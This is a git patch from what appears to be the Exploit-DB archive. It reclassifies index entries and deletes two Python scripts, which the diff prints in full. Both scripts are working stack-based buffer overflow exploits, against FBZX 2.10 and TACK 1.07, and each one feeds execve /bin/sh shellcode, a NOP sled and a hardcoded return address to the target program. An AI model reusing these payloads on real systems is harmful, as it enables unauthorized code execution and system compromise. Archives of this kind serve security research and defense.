From 2270e920153a508319886139e9e6fae1b571c355 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 29 Nov 2015 05:03:06 +0000 Subject: [PATCH] DB: 2015-11-29 --- files.csv | 5 ++-- platforms/linux/local/38681.py | 48 ---------------------------------- platforms/linux/local/38685.py | 48 ---------------------------------- 3 files changed, 2 insertions(+), 99 deletions(-) delete mode 100755 platforms/linux/local/38681.py delete mode 100755 platforms/linux/local/38685.py diff --git a/files.csv b/files.csv index 689ba473e..0613a8275 100755 --- a/files.csv +++ b/files.csv @@ -34955,11 +34955,10 @@ id,file,description,date,author,platform,type,port 38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0 -38681,platforms/linux/local/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,local,0 +38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0 38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 38683,platforms/php/webapps/38683.txt,"Jahia xCM /administration/ Multiple Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 -38685,platforms/linux/local/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0 -38686,platforms/linux/local/38686.py,"TUDU 0.82 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0 +38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0 38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0 38688,platforms/php/webapps/38688.txt,"b374k Web Shell - CSRF Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 38689,platforms/php/webapps/38689.txt,"SilverStripe 'MemberLoginForm.php' Information Disclosure Vulnerability",2013-08-01,"Fara Rustein",php,webapps,0 diff --git a/platforms/linux/local/38681.py b/platforms/linux/local/38681.py deleted file mode 100755 index 6397c447d..000000000 --- a/platforms/linux/local/38681.py +++ /dev/null @@ -1,48 +0,0 @@ -# Exploit Author: Juan Sacco - http://www.exploitpack.com -# Program: fbzx - ZX Spectrum Emulator for X -# Tested on: GNU/Linux - Kali Linux 2.0 x86 -# -# Description: FBZX v2.10 and prior is prone to a stack-based buffer overflow -# vulnerability because the application fails to perform adequate -# boundary-checks on user-supplied input. -# -# An attacker could exploit this issue to execute arbitrary code in the -# context of the application. Failed exploit attempts will result in a -# denial-of-service condition. -# -# Vendor homepage: *http://www.rastersoft.com/ * -# Kali Linux 2.0 package: http://repo.kali.org/kali/pool/contrib/f/fbzx/ -# MD5: 0fc1d2e9c374c1156b2b02186a9f8980 - -import os,subprocess -def run(): - try: - print "# FBZX v2.10 Stack-Based Overflow by Juan Sacco" - print "# It's Fuzzing time on unusable exploits" - print "# This exploit is for educational purposes only" - # Basic structure: JUNK + SHELLCODE + NOPS + EIP - - junk = "\x41"*8 - shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" - nops = "\x90"*5010 - eip = "\x10\xd3\xff\xbf" - subprocess.call(["fbzx",' ', junk + shellcode + nops + eip]) - - except OSError as e: - if e.errno == os.errno.ENOENT: - print "FBZX not found!" - else: - print "Error executing exploit" - raise - -def howtousage(): - print "Sorry, something went wrong" - sys.exit(-1) - -if __name__ == '__main__': - try: - print "Exploit FBZX 2.10 Local Overflow Exploit" - print "Author: Juan Sacco" - except IndexError: - howtousage() -run() diff --git a/platforms/linux/local/38685.py b/platforms/linux/local/38685.py deleted file mode 100755 index b13c68c99..000000000 --- a/platforms/linux/local/38685.py +++ /dev/null @@ -1,48 +0,0 @@ -# Exploit Author: Juan Sacco - http://www.exploitpack.com -# Program: tack - Terminal action checker -# Tested on: GNU/Linux - Kali Linux 2.0 x86 -# -# Description: TACK v1.07 and prior is prone to a stack-based buffer overflow -# vulnerability because the application fails to perform adequate -# boundary-checks on user-supplied input. -# -# An attacker could exploit this issue to execute arbitrary code in the -# context of the application. Failed exploit attempts will result in a -# denial-of-service condition. -# -# Vendor homepage: *http://www.z nyx.com * -# Kali Linux 2.0 package: pool/main/t/tack/tack_1.07-1_amd64.deb -# MD5: 0fc1d2e9c374c1156b2b02186a9f8980 - -import os,subprocess -def run(): - try: - print "# TACK v1.07 Stack-Based Overflow by Juan Sacco" - print "# It's Fuzzing time on unusable exploits" - print "# This exploit is for educational purposes only" - # Basic structure: JUNK + SHELLCODE + NOPS + EIP - - junk = "\x41"*10 - shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" - nops = "\x90"*3022 - eip = "\x30\xd1\xff\xbf" - subprocess.call(["tack",' ', junk + shellcode + nops + eip]) - - except OSError as e: - if e.errno == os.errno.ENOENT: - print "TACK not found!" - else: - print "Error executing exploit" - raise - -def howtousage(): - print "Sorry, something went wrong" - sys.exit(-1) - -if __name__ == '__main__': - try: - print "Exploit TACK 1.07 Local Overflow Exploit" - print "Author: Juan Sacco" - except IndexError: - howtousage() -run()